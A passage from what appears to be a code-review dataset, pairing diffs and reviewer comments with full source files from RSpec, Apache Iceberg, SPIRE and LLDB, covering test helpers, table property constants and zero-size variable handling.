expect(list_value_1).to equal(list_value_2)
expect(subject_value_1).to equal(subject_value_2)
expect(subject_value_1).to equal(list_value_1)
end
it "is referred from inside subject by the name" do
inner_subject_value = nil
ExampleGroup.describe do
subject(:list) { [1, 2, 3] }
describe 'first' do
subject(:first_element) { list.first }
example { inner_subject_value = subject }
end
end.run
expect(inner_subject_value).to eq(1)
end
it 'can continue to be referenced by the name even when an inner group redefines the subject' do
named_value = nil
ExampleGroup.describe do
subject(:named) { :outer }
describe "inner" do
subject { :inner }
example do
subject # so the inner subject method is run and memoized
named_value = self.named
end
end
end.run
expect(named_value).to eq(:outer)
end
it 'can continue to reference an inner subject after the outer subject name is referenced' do
subject_value = nil
ExampleGroup.describe do
subject(:named) { :outer }
describe "inner" do
subject { :inner }
example do
named # so the outer subject method is run and memoized
subject_value = self.subject
end
end
end.run
expect(subject_value).to eq(:inner)
end
it 'is not overriden when an inner group defines a new method with the same name' do
subject_value = nil
ExampleGroup.describe do
subject(:named) { :outer_subject }
describe "inner" do
let(:named) { :inner_named }
example { subject_value = self.subject }
end
end.run
expect(subject_value).to be(:outer_subject)
end
context 'when `super` is used' do
def should_raise_not_supported_error(&block)
ex = nil
ExampleGroup.describe do
let(:list) { ["a", "b", "c"] }
subject { [1, 2, 3] }
describe 'first' do
module_eval(&block) if block
subject(:list) { super().first(2) }
ex = example { subject }
end
end.run
expect(ex.execution_result[:status]).to eq("failed")
expect(ex.execution_result[:exception].message).to match(/super.*not supported/)
end
it 'raises a "not supported" error' do
should_raise_not_supported_error
end
context 'with a `let` definition before the named subject' do
it 'raises a "not supported" error' do
should_raise_not_supported_error do
# My first pass implementation worked unless there was a `let`
# declared before the named subject -- this let is in place to
# ensure that bug doesn't return.
let(:foo) { 3 }
end
end
end
end
end
end
context "using 'self' as an explicit subject" do
it "delegates matcher to the ExampleGroup" do
group = ExampleGroup.describe("group") do
subject { self }
def ok?; true; end
def not_ok?; false; end
it { should eq(self) }
it { should be_ok }
it { should_not be_not_ok }
end
expect(group.run).to be_truthy
end
end
describe "#its" do
subject do
Class.new do
def initialize
@call_count = 0
end
def call_count
@call_count += 1
end
end.new
end
context "with a call counter" do
its(:call_count) { should eq(1) }
end
context "with nil value" do
subject do
Class.new do
def nil_value
nil
end
end.new
end
its(:nil_value) { should be_nil }
end
context "with nested attributes" do
subject do
Class.new do
def name
"John"
end
end.new
end
its("name") { should eq("John") }
its("name.size") { should eq(4) }
its("name.size.class") { should eq(Fixnum) }
end
context "when it responds to #[]" do
subject do
Class.new do
def [](*objects)
objects.map do |object|
"#{object.class}: #{object.to_s}"
end.join("; ")
end
def name
"George"
end
end.new
end
its([:a]) { should eq("Symbol: a") }
its(['a']) { should eq("String: a") }
its([:b, 'c', 4]) { should eq("Symbol: b; String: c; Fixnum: 4") }
its(:name) { should eq("George") }
context "when referring to an attribute without the proper array syntax" do
context "it raises an error" do
its(:age) do
expect do
should eq(64)
end.to raise_error(NoMethodError)
end
end
end
end
context "when it does not respond to #[]" do
subject { Object.new }
context "it raises an error" do
its([:a]) do
expect do
should eq("Symbol: a")
end.to raise_error(NoMethodError)
end
end
end
context "calling and overriding super" do
it "calls to the subject defined in the parent group" do
group = ExampleGroup.describe(Array) do
subject { [1, 'a'] }
its(:last) { should eq("a") }
describe '.first' do
def subject; super().first; end
its(:next) { should eq(2) }
end
end
expect(group.run).to be_truthy
end
end
context "with nil subject" do
subject do
Class.new do
def initialize
@counter = -1
end
def nil_if_first_time
@counter += 1
@counter == 0 ? nil : true
end
end.new
end
its(:nil_if_first_time) { should be(nil) }
end
context "with false subject" do
subject do
Class.new do
def initialize
@counter = -1
end
def false_if_first_time
@counter += 1
@counter > 0
end
end.new
end
its(:false_if_first_time) { should be(false) }
end
describe 'accessing `subject` in `before` and `let`' do
subject { 'my subject' }
before { @subject_in_before = subject }
let(:subject_in_let) { subject }
let!(:eager_loaded_subject_in_let) { subject }
# These examples read weird, because we're actually
# specifying the behaviour of `its` itself
its(nil) { expect(subject).to eq('my subject') }
its(nil) { expect(@subject_in_before).to eq('my subject') }
its(nil) { expect(subject_in_let).to eq('my subject') }
its(nil) { expect(eager_loaded_subject_in_let).to eq('my subject') }
end
end
describe '#subject!' do
let(:prepared_array) { [1,2,3] }
subject! { prepared_array.pop }
it "evaluates subject before example" do
expect(prepared_array).to eq([1,2])
end
it "returns memoized value from first invocation" do
expect(subject).to eq(3)
end
end
end
describe "#let" do
let(:counter) do
Class.new do
def initialize
@count = 0
end
def count
@count += 1
end
end.new
end
let(:nil_value) do
@nil_value_count += 1
nil
end
it "generates an instance method" do
expect(counter.count).to eq(1)
end
it "caches the value" do
expect(counter.count).to eq(1)
expect(counter.count).to eq(2)
end
it "caches a nil value" do
@nil_value_count = 0
nil_value
nil_value
expect(@nil_value_count).to eq(1)
end
let(:yield_the_example) do |example_yielded_to_let|
@example_yielded_to_let = example_yielded_to_let
end
it "yields the example" do |example_yielded_to_example|
yield_the_example
expect(@example_yielded_to_let).to equal example_yielded_to_example
end
let(:regex_with_capture) { %r[RegexWithCapture(\d)] }
it 'does not pass the block up the ancestor chain' do
# Test for Ruby bug http://bugs.ruby-lang.org/issues/8059
expect("RegexWithCapture1".match(regex_with_capture)[1]).to eq('1')
end
it 'raises a useful error when called without a block' do
expect do
ExampleGroup.describe { let(:list) }
end.to raise_error(/#let or #subject called without a block/)
end
let(:a_value) { "a string" }
context 'when overriding let in a nested context' do
let(:a_value) { super() + " (modified)" }
it 'can use `super` to reference the parent context value' do
expect(a_value).to eq("a string (modified)")
end
end
context 'when the declaration uses `return`' do
let(:value) do
return :early_exit if @early_exit
:late_exit
end
it 'can exit the let declaration early' do
@early_exit = true
expect(value).to eq(:early_exit)
end
it 'can get past a conditional `return` statement' do
@early_exit = false
expect(value).to eq(:late_exit)
end
end
context 'when referenced in a `before(:all)` hook' do
before do
expect(::RSpec).to respond_to(:warn_deprecation)
::RSpec.stub(:warn_deprecation)
end
def define_and_run_group
values = { :reference_lines => [] }
ExampleGroup.describe do
let(:list) { [1, 2] }
subject { %w[ a b ] }
before(:all) do
list << 3; values[:reference_lines] << __LINE__
values[:final_list_value_in_before_all] = list; values[:reference_lines] << __LINE__
end
example do
subject << "1"
values[:subject_in_ex_1] = subject
values[:list_value_in_example] = list
end
example do
subject << "2"
values[:subject_in_ex_2] = subject
end
end.run
values
end
it 'memoizes the value within the before(:all) hook' do
values = define_and_run_group
expect(values.fetch(:final_list_value_in_before_all)).to eq([1, 2, 3])
end
it 'preserves the memoized value into the examples' do
values = define_and_run_group
expect(values.fetch(:list_value_in_example)).to eq([1, 2, 3])
end
it 'does not cause the subject to be shared across examples' do
values = define_and_run_group
expect(values.fetch(:subject_in_ex_1)).to eq(%w[ a b 1 ])
expect(values.fetch(:subject_in_ex_2)).to eq(%w[ a b 2 ])
end
it 'prints a warning since `let` declarations are not intended to be used in :all hooks' do
msgs = []
::RSpec.stub(:warn_deprecation) { |msg| msgs << msg }
values = define_and_run_group
expect(msgs).to include(*values[:reference_lines].map { |line|
match(/let declaration `list` accessed.*#{__FILE__}:#{line}/m)
})
end
end
context "when included modules have hooks that define memoized helpers" do
it "allows memoized helpers to override methods in previously included modules" do
group = ExampleGroup.describe do
include Module.new {
def self.included(m); m.let(:unrelated) { :unrelated }; end
}
include Module.new {
def hello_message; "Hello from module"; end
}
let(:hello_message) { "Hello from let" }
end
expect(group.new.hello_message).to eq("Hello from let")
end
end
end
describe "#let!" do
subject { [1,2,3] }
let!(:popped) { subject.pop }
it "evaluates the value non-lazily" do
expect(subject).to eq([1,2])
end
it "returns memoized value from first invocation" do
expect(popped).to eq(3)
end
end
describe 'using subject in before and let blocks' do
shared_examples_for 'a subject' do
let(:subject_id_in_let) { subject.object_id }
before { @subject_id_in_before = subject.object_id }
it 'should be memoized' do
expect(subject_id_in_let).to eq(@subject_id_in_before)
end
it { should eq(subject) }
end
describe Object do
context 'with implicit subject' do
it_should_behave_like 'a subject'
end
context 'with explicit subject' do
subject { Object.new }
it_should_behave_like 'a subject'
end
context 'with a constant subject'do
subject { 123 }
it_should_behave_like 'a subject'
end
end
end
describe 'Module#define_method' do
it 'is still a private method' do
a_module = Module.new
expect { a_module.define_method(:name) { "implementation" } }.to raise_error NoMethodError
end
end
end
| 1 | 10,694 | It'd be nice to assert the right deprecation is being raised, just add a third argument of `/"its" method/` | rspec-rspec-core | rb |
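
A minimal, self-contained sketch of the reviewer's suggestion (the helper and the deprecation text below are assumptions for illustration, not the actual rspec-core spec code): the point of the third argument is that the assertion matches *which* deprecation was emitted, so the example cannot pass on an unrelated warning.

    # Hedged sketch: helper name and message text are assumed, not taken from rspec-core.
    def expect_deprecation_matching(captured_messages, pattern)
      unless captured_messages.any? { |msg| msg =~ pattern }
        raise "expected a deprecation matching #{pattern.inspect}, got #{captured_messages.inspect}"
      end
    end

    captured = ['Use of the "its" method is deprecated. Use the rspec-its gem instead.'] # assumed message
    expect_deprecation_matching(captured, /"its" method/) # passes only for the "its" deprecation
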
@@ -87,6 +87,8 @@ public class TableProperties {
public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled";
public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
+ public static final String LOCATION_PROVIDER_IMPL = "write.location-provider.impl";
+
public static final String OBJECT_STORE_PATH = "write.object-storage.path";
// This only applies to files written after this property is set. Files previously written aren't | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg;
public class TableProperties {
private TableProperties() {
}
public static final String COMMIT_NUM_RETRIES = "commit.retry.num-retries";
public static final int COMMIT_NUM_RETRIES_DEFAULT = 4;
public static final String COMMIT_MIN_RETRY_WAIT_MS = "commit.retry.min-wait-ms";
public static final int COMMIT_MIN_RETRY_WAIT_MS_DEFAULT = 100;
public static final String COMMIT_MAX_RETRY_WAIT_MS = "commit.retry.max-wait-ms";
public static final int COMMIT_MAX_RETRY_WAIT_MS_DEFAULT = 60000; // 1 minute
public static final String COMMIT_TOTAL_RETRY_TIME_MS = "commit.retry.total-timeout-ms";
public static final int COMMIT_TOTAL_RETRY_TIME_MS_DEFAULT = 1800000; // 30 minutes
public static final String MANIFEST_TARGET_SIZE_BYTES = "commit.manifest.target-size-bytes";
public static final long MANIFEST_TARGET_SIZE_BYTES_DEFAULT = 8388608; // 8 MB
public static final String MANIFEST_MIN_MERGE_COUNT = "commit.manifest.min-count-to-merge";
public static final int MANIFEST_MIN_MERGE_COUNT_DEFAULT = 100;
public static final String MANIFEST_MERGE_ENABLED = "commit.manifest-merge.enabled";
public static final boolean MANIFEST_MERGE_ENABLED_DEFAULT = true;
public static final String DEFAULT_FILE_FORMAT = "write.format.default";
public static final String DEFAULT_FILE_FORMAT_DEFAULT = "parquet";
public static final String PARQUET_ROW_GROUP_SIZE_BYTES = "write.parquet.row-group-size-bytes";
public static final String PARQUET_ROW_GROUP_SIZE_BYTES_DEFAULT = "134217728"; // 128 MB
public static final String PARQUET_PAGE_SIZE_BYTES = "write.parquet.page-size-bytes";
public static final String PARQUET_PAGE_SIZE_BYTES_DEFAULT = "1048576"; // 1 MB
public static final String PARQUET_DICT_SIZE_BYTES = "write.parquet.dict-size-bytes";
public static final String PARQUET_DICT_SIZE_BYTES_DEFAULT = "2097152"; // 2 MB
public static final String PARQUET_COMPRESSION = "write.parquet.compression-codec";
public static final String PARQUET_COMPRESSION_DEFAULT = "gzip";
public static final String PARQUET_COMPRESSION_LEVEL = "write.parquet.compression-level";
public static final String PARQUET_COMPRESSION_LEVEL_DEFAULT = null;
public static final String AVRO_COMPRESSION = "write.avro.compression-codec";
public static final String AVRO_COMPRESSION_DEFAULT = "gzip";
public static final String SPLIT_SIZE = "read.split.target-size";
public static final long SPLIT_SIZE_DEFAULT = 134217728; // 128 MB
public static final String METADATA_SPLIT_SIZE = "read.split.metadata-target-size";
public static final long METADATA_SPLIT_SIZE_DEFAULT = 32 * 1024 * 1024; // 32 MB
public static final String SPLIT_LOOKBACK = "read.split.planning-lookback";
public static final int SPLIT_LOOKBACK_DEFAULT = 10;
public static final String SPLIT_OPEN_FILE_COST = "read.split.open-file-cost";
public static final long SPLIT_OPEN_FILE_COST_DEFAULT = 4 * 1024 * 1024; // 4MB
public static final String PARQUET_VECTORIZATION_ENABLED = "read.parquet.vectorization.enabled";
public static final boolean PARQUET_VECTORIZATION_ENABLED_DEFAULT = false;
public static final String PARQUET_BATCH_SIZE = "read.parquet.vectorization.batch-size";
public static final int PARQUET_BATCH_SIZE_DEFAULT = 5000;
public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled";
public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
public static final String OBJECT_STORE_PATH = "write.object-storage.path";
// This only applies to files written after this property is set. Files previously written aren't
// relocated to reflect this parameter.
// If not set, defaults to a "data" folder underneath the root path of the table.
public static final String WRITE_NEW_DATA_LOCATION = "write.folder-storage.path";
// This only applies to files written after this property is set. Files previously written aren't
// relocated to reflect this parameter.
// If not set, defaults to a "metadata" folder underneath the root path of the table.
public static final String WRITE_METADATA_LOCATION = "write.metadata.path";
public static final String MANIFEST_LISTS_ENABLED = "write.manifest-lists.enabled";
public static final boolean MANIFEST_LISTS_ENABLED_DEFAULT = true;
public static final String METADATA_COMPRESSION = "write.metadata.compression-codec";
public static final String METADATA_COMPRESSION_DEFAULT = "none";
public static final String METADATA_PREVIOUS_VERSIONS_MAX = "write.metadata.previous-versions-max";
public static final int METADATA_PREVIOUS_VERSIONS_MAX_DEFAULT = 100;
// This enables to delete the oldest metadata file after commit.
public static final String METADATA_DELETE_AFTER_COMMIT_ENABLED = "write.metadata.delete-after-commit.enabled";
public static final boolean METADATA_DELETE_AFTER_COMMIT_ENABLED_DEFAULT = false;
public static final String METRICS_MODE_COLUMN_CONF_PREFIX = "write.metadata.metrics.column.";
public static final String DEFAULT_WRITE_METRICS_MODE = "write.metadata.metrics.default";
public static final String DEFAULT_WRITE_METRICS_MODE_DEFAULT = "truncate(16)";
public static final String DEFAULT_NAME_MAPPING = "schema.name-mapping.default";
public static final String WRITE_AUDIT_PUBLISH_ENABLED = "write.wap.enabled";
public static final String WRITE_AUDIT_PUBLISH_ENABLED_DEFAULT = "false";
public static final String WRITE_TARGET_FILE_SIZE_BYTES = "write.target-file-size-bytes";
public static final long WRITE_TARGET_FILE_SIZE_BYTES_DEFAULT = Long.MAX_VALUE;
public static final String SNAPSHOT_ID_INHERITANCE_ENABLED = "compatibility.snapshot-id-inheritance.enabled";
public static final boolean SNAPSHOT_ID_INHERITANCE_ENABLED_DEFAULT = false;
}
| 1 | 25,793 | Do we want to add this to the docs? | apache-iceberg | java |
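
If this property does get documented, a usage snippet along these lines is probably what would go there. This is only a hedged sketch: it assumes (the diff itself does not say) that the value is the fully-qualified class name of a custom LocationProvider implementation, and "com.example.MyLocationProvider" is a hypothetical placeholder.

    import org.apache.iceberg.Table;
    import org.apache.iceberg.TableProperties;

    public class ConfigureLocationProvider {
      // Hedged sketch: sets the new property on an existing table;
      // the provider class name is a placeholder, not a real class.
      public static void apply(Table table) {
        table.updateProperties()
            .set(TableProperties.LOCATION_PROVIDER_IMPL, "com.example.MyLocationProvider")
            .commit();
      }
    }
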
@@ -46,7 +46,7 @@ func AssertGRPCStatus(tb testing.TB, err error, code codes.Code, message string)
st := status.Convert(err)
ok := true
- if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
+ if !assert.Equal(tb, code.String(), st.Code().String(), "GRPC status code does not match") {
ok = false
}
if !assert.Equal(tb, message, st.Message(), "GRPC status message does not match") { | 1 | package spiretest
import (
"reflect"
"testing"
"github.com/google/go-cmp/cmp"
"github.com/stretchr/testify/assert"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
"google.golang.org/protobuf/proto"
"google.golang.org/protobuf/testing/protocmp"
)
var (
protoMessageType = reflect.TypeOf((*proto.Message)(nil)).Elem()
)
func RequireErrorContains(tb testing.TB, err error, contains string) {
tb.Helper()
if !AssertErrorContains(tb, err, contains) {
tb.FailNow()
}
}
func AssertErrorContains(tb testing.TB, err error, contains string) bool {
tb.Helper()
if !assert.Error(tb, err) {
return false
}
if !assert.Contains(tb, err.Error(), contains) {
return false
}
return true
}
func RequireGRPCStatus(tb testing.TB, err error, code codes.Code, message string) {
tb.Helper()
if !AssertGRPCStatus(tb, err, code, message) {
tb.FailNow()
}
}
func AssertGRPCStatus(tb testing.TB, err error, code codes.Code, message string) bool {
tb.Helper()
st := status.Convert(err)
ok := true
if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
ok = false
}
if !assert.Equal(tb, message, st.Message(), "GRPC status message does not match") {
ok = false
}
return ok
}
func RequireGRPCStatusContains(tb testing.TB, err error, code codes.Code, contains string) {
tb.Helper()
if !AssertGRPCStatusContains(tb, err, code, contains) {
tb.FailNow()
}
}
func AssertGRPCStatusContains(tb testing.TB, err error, code codes.Code, contains string) bool {
tb.Helper()
st := status.Convert(err)
if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
return false
}
if !assert.Contains(tb, st.Message(), contains, "GRPC status message does not contain substring") {
return false
}
return true
}
func RequireProtoListEqual(tb testing.TB, expected, actual interface{}) {
tb.Helper()
if !AssertProtoListEqual(tb, expected, actual) {
tb.FailNow()
}
}
func AssertProtoListEqual(tb testing.TB, expected, actual interface{}) bool {
tb.Helper()
ev := reflect.ValueOf(expected)
et := ev.Type()
av := reflect.ValueOf(actual)
at := av.Type()
if et.Kind() != reflect.Slice {
return assert.Fail(tb, "expected value is not a slice")
}
if !et.Elem().Implements(protoMessageType) {
return assert.Fail(tb, "expected value is not a slice of elements that implement proto.Message")
}
if at.Kind() != reflect.Slice {
return assert.Fail(tb, "actual value is not a slice")
}
if !at.Elem().Implements(protoMessageType) {
return assert.Fail(tb, "actual value is not a slice of elements that implement proto.Message")
}
if !assert.Equal(tb, ev.Len(), av.Len(), "expected %d elements in list; got %d", ev.Len(), av.Len()) {
// get the nice output
return assert.Equal(tb, expected, actual)
}
for i := 0; i < ev.Len(); i++ {
e := ev.Index(i).Interface().(proto.Message)
a := av.Index(i).Interface().(proto.Message)
if !AssertProtoEqual(tb, e, a, "proto %d in list is not equal", i) {
// get the nice output
return assert.Equal(tb, expected, actual)
}
}
return true
}
func RequireProtoEqual(tb testing.TB, expected, actual proto.Message, msgAndArgs ...interface{}) {
tb.Helper()
if !AssertProtoEqual(tb, expected, actual, msgAndArgs...) {
tb.FailNow()
}
}
func AssertProtoEqual(tb testing.TB, expected, actual proto.Message, msgAndArgs ...interface{}) bool {
tb.Helper()
return assert.Empty(tb, cmp.Diff(expected, actual, protocmp.Transform()), msgAndArgs...)
}
| 1 | 16,075 | This isn't really related but makes debugging test failures much easier since you see the string representation of the code instead of the integer value. | spiffe-spire | go |
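
A standalone illustration of that reasoning (not part of spiretest): comparing the raw codes.Code values reports a mismatch as bare integers, while comparing the String() forms reports the code names, which is what makes a failed assertion readable.

    package main

    import (
        "fmt"

        "google.golang.org/grpc/codes"
    )

    func main() {
        expected, actual := codes.InvalidArgument, codes.NotFound

        // Raw values: a failed equality check reads like "3 != 5".
        fmt.Printf("as integers: expected %d, got %d\n", expected, actual)

        // String() forms: the same mismatch reads "InvalidArgument != NotFound".
        fmt.Printf("as strings:  expected %s, got %s\n", expected.String(), actual.String())
    }
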
@@ -130,6 +130,18 @@ bool ValueObjectVariable::UpdateValue() {
m_error.Clear();
Variable *variable = m_variable_sp.get();
+ // Check if the type has size 0. If so, there is nothing to update.
+ CompilerType var_type(GetCompilerTypeImpl());
+ if (var_type.IsValid()) {
+ ExecutionContext exe_ctx(GetExecutionContextRef());
+ llvm::Optional<uint64_t> size =
+ var_type.GetByteSize(exe_ctx.GetBestExecutionContextScope());
+ if (size && *size == 0) {
+ m_value.SetCompilerType(var_type);
+ return m_error.Success();
+ }
+ }
+
DWARFExpression &expr = variable->LocationExpression();
if (variable->GetLocationIsConstantValueData()) { | 1 | //===-- ValueObjectVariable.cpp ---------------------------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "lldb/Core/ValueObjectVariable.h"
#include "lldb/Core/Address.h"
#include "lldb/Core/AddressRange.h"
#include "lldb/Core/Module.h"
#include "lldb/Core/Value.h"
#include "lldb/Expression/DWARFExpression.h"
#include "lldb/Symbol/Declaration.h"
#include "lldb/Symbol/Function.h"
#include "lldb/Symbol/ObjectFile.h"
#include "lldb/Symbol/SymbolContext.h"
#include "lldb/Symbol/SymbolContextScope.h"
#include "lldb/Symbol/Type.h"
#include "lldb/Symbol/Variable.h"
#include "lldb/Target/ExecutionContext.h"
#include "lldb/Target/LanguageRuntime.h"
#include "lldb/Target/Process.h"
#include "lldb/Target/RegisterContext.h"
#include "lldb/Target/Target.h"
#include "lldb/Utility/DataExtractor.h"
#include "lldb/Utility/RegisterValue.h"
#include "lldb/Utility/Scalar.h"
#include "lldb/Utility/Status.h"
#include "lldb/lldb-private-enumerations.h"
#include "lldb/lldb-types.h"
#include "llvm/ADT/StringRef.h"
#include <assert.h>
#include <memory>
namespace lldb_private {
class ExecutionContextScope;
}
namespace lldb_private {
class StackFrame;
}
namespace lldb_private {
struct RegisterInfo;
}
using namespace lldb_private;
lldb::ValueObjectSP
ValueObjectVariable::Create(ExecutionContextScope *exe_scope,
const lldb::VariableSP &var_sp) {
return (new ValueObjectVariable(exe_scope, var_sp))->GetSP();
}
ValueObjectVariable::ValueObjectVariable(ExecutionContextScope *exe_scope,
const lldb::VariableSP &var_sp)
: ValueObject(exe_scope), m_variable_sp(var_sp) {
// Do not attempt to construct one of these objects with no variable!
assert(m_variable_sp.get() != NULL);
m_name = var_sp->GetName();
}
ValueObjectVariable::~ValueObjectVariable() {}
CompilerType ValueObjectVariable::GetCompilerTypeImpl() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetForwardCompilerType();
return CompilerType();
}
ConstString ValueObjectVariable::GetTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetName();
return ConstString();
}
ConstString ValueObjectVariable::GetDisplayTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type) {
const SymbolContext *sc = nullptr;
if (GetFrameSP())
sc = &GetFrameSP()->GetSymbolContext(lldb::eSymbolContextFunction);
return var_type->GetForwardCompilerType().GetDisplayTypeName(sc);
}
return ConstString();
}
ConstString ValueObjectVariable::GetQualifiedTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetQualifiedName();
return ConstString();
}
size_t ValueObjectVariable::CalculateNumChildren(uint32_t max) {
CompilerType type(GetCompilerType());
if (!type.IsValid())
return 0;
ExecutionContext exe_ctx(GetExecutionContextRef());
const bool omit_empty_base_classes = true;
auto child_count = type.GetNumChildren(omit_empty_base_classes, &exe_ctx);
return child_count <= max ? child_count : max;
}
uint64_t ValueObjectVariable::GetByteSize() {
ExecutionContext exe_ctx(GetExecutionContextRef());
CompilerType type(GetCompilerType());
if (!type.IsValid())
return 0;
return type.GetByteSize(exe_ctx.GetBestExecutionContextScope()).getValueOr(0);
}
lldb::ValueType ValueObjectVariable::GetValueType() const {
if (m_variable_sp)
return m_variable_sp->GetScope();
return lldb::eValueTypeInvalid;
}
bool ValueObjectVariable::UpdateValue() {
SetValueIsValid(false);
m_error.Clear();
Variable *variable = m_variable_sp.get();
DWARFExpression &expr = variable->LocationExpression();
if (variable->GetLocationIsConstantValueData()) {
// expr doesn't contain DWARF bytes, it contains the constant variable
// value bytes themselves...
if (expr.GetExpressionData(m_data)) {
if (m_data.GetDataStart() && m_data.GetByteSize())
m_value.SetBytes(m_data.GetDataStart(), m_data.GetByteSize());
m_value.SetContext(Value::eContextTypeVariable, variable);
} else {
CompilerType var_type(GetCompilerTypeImpl());
if (var_type.IsValid()) {
ExecutionContext exe_ctx(GetExecutionContextRef());
llvm::Optional<uint64_t> size =
var_type.GetByteSize(exe_ctx.GetBestExecutionContextScope());
if (size && *size == 0)
m_value.SetCompilerType(var_type);
else
m_error.SetErrorString("empty constant data");
}
}
// constant bytes can't be edited - sorry
m_resolved_value.SetContext(Value::eContextTypeInvalid, NULL);
SetAddressTypeOfChildren(eAddressTypeInvalid);
} else {
lldb::addr_t loclist_base_load_addr = LLDB_INVALID_ADDRESS;
ExecutionContext exe_ctx(GetExecutionContextRef());
Target *target = exe_ctx.GetTargetPtr();
if (target) {
m_data.SetByteOrder(target->GetArchitecture().GetByteOrder());
m_data.SetAddressByteSize(target->GetArchitecture().GetAddressByteSize());
}
if (expr.IsLocationList()) {
SymbolContext sc;
variable->CalculateSymbolContext(&sc);
if (sc.function)
loclist_base_load_addr =
sc.function->GetAddressRange().GetBaseAddress().GetLoadAddress(
target);
}
Value old_value(m_value);
if (expr.Evaluate(&exe_ctx, nullptr, loclist_base_load_addr, nullptr,
nullptr, m_value, &m_error)) {
m_resolved_value = m_value;
m_value.SetContext(Value::eContextTypeVariable, variable);
CompilerType compiler_type = GetCompilerType();
if (compiler_type.IsValid())
m_value.SetCompilerType(compiler_type);
Value::ValueType value_type = m_value.GetValueType();
Process *process = exe_ctx.GetProcessPtr();
const bool process_is_alive = process && process->IsAlive();
const uint32_t type_info =
compiler_type.IsValid() ? compiler_type.GetTypeInfo() : 0;
const bool is_pointer_or_ref =
(type_info & (lldb::eTypeIsPointer | lldb::eTypeIsReference)) != 0;
// BEGIN Swift
      if (variable->GetType() &&
variable->GetType()->IsSwiftFixedValueBuffer())
if (auto process_sp = GetProcessSP())
if (auto runtime = process_sp->GetLanguageRuntime(
compiler_type.GetMinimumLanguage())) {
if (!runtime->IsStoredInlineInBuffer(compiler_type)) {
lldb::addr_t addr =
m_value.GetScalar().ULongLong(LLDB_INVALID_ADDRESS);
if (addr != LLDB_INVALID_ADDRESS) {
Target &target = process_sp->GetTarget();
size_t ptr_size = process_sp->GetAddressByteSize();
lldb::addr_t deref_addr;
target.ReadMemory(addr, false, &deref_addr, ptr_size, m_error);
m_value.GetScalar() = deref_addr;
}
}
}
// END Swift
switch (value_type) {
case Value::eValueTypeFileAddress:
// If this type is a pointer, then its children will be considered load
// addresses if the pointer or reference is dereferenced, but only if
// the process is alive.
//
// There could be global variables like in the following code:
// struct LinkedListNode { Foo* foo; LinkedListNode* next; };
// Foo g_foo1;
// Foo g_foo2;
// LinkedListNode g_second_node = { &g_foo2, NULL };
// LinkedListNode g_first_node = { &g_foo1, &g_second_node };
//
// When we aren't running, we should be able to look at these variables
// using the "target variable" command. Children of the "g_first_node"
// always will be of the same address type as the parent. But children
// of the "next" member of LinkedListNode will become load addresses if
        // we have a live process, or remain a file address if it was a
// file address.
if (process_is_alive && is_pointer_or_ref)
SetAddressTypeOfChildren(eAddressTypeLoad);
else
SetAddressTypeOfChildren(eAddressTypeFile);
break;
case Value::eValueTypeHostAddress:
// Same as above for load addresses, except children of pointer or refs
// are always load addresses. Host addresses are used to store freeze
// dried variables. If this type is a struct, the entire struct
// contents will be copied into the heap of the
// LLDB process, but we do not currently follow any pointers.
if (is_pointer_or_ref)
SetAddressTypeOfChildren(eAddressTypeLoad);
else
SetAddressTypeOfChildren(eAddressTypeHost);
break;
case Value::eValueTypeLoadAddress:
case Value::eValueTypeScalar:
case Value::eValueTypeVector:
SetAddressTypeOfChildren(eAddressTypeLoad);
break;
}
switch (value_type) {
case Value::eValueTypeVector:
// fall through
case Value::eValueTypeScalar:
// The variable value is in the Scalar value inside the m_value. We can
// point our m_data right to it.
m_error =
m_value.GetValueAsData(&exe_ctx, m_data, 0, GetModule().get());
break;
case Value::eValueTypeFileAddress:
case Value::eValueTypeLoadAddress:
case Value::eValueTypeHostAddress:
// The DWARF expression result was an address in the inferior process.
// If this variable is an aggregate type, we just need the address as
// the main value as all child variable objects will rely upon this
// location and add an offset and then read their own values as needed.
// If this variable is a simple type, we read all data for it into
// m_data. Make sure this type has a value before we try and read it
// If we have a file address, convert it to a load address if we can.
if (value_type == Value::eValueTypeFileAddress && process_is_alive)
m_value.ConvertToLoadAddress(GetModule().get(), target);
if (!CanProvideValue()) {
// this value object represents an aggregate type whose children have
// values, but this object does not. So we say we are changed if our
// location has changed.
SetValueDidChange(value_type != old_value.GetValueType() ||
m_value.GetScalar() != old_value.GetScalar());
} else {
// Copy the Value and set the context to use our Variable so it can
          // extract and read its value into m_data appropriately
Value value(m_value);
value.SetContext(Value::eContextTypeVariable, variable);
m_error =
value.GetValueAsData(&exe_ctx, m_data, 0, GetModule().get());
SetValueDidChange(value_type != old_value.GetValueType() ||
m_value.GetScalar() != old_value.GetScalar());
}
break;
}
SetValueIsValid(m_error.Success());
} else {
// could not find location, won't allow editing
m_resolved_value.SetContext(Value::eContextTypeInvalid, NULL);
}
}
return m_error.Success();
}
bool ValueObjectVariable::IsInScope() {
const ExecutionContextRef &exe_ctx_ref = GetExecutionContextRef();
if (exe_ctx_ref.HasFrameRef()) {
ExecutionContext exe_ctx(exe_ctx_ref);
StackFrame *frame = exe_ctx.GetFramePtr();
if (frame) {
return m_variable_sp->IsInScope(frame);
} else {
// This ValueObject had a frame at one time, but now we can't locate it,
// so return false since we probably aren't in scope.
return false;
}
}
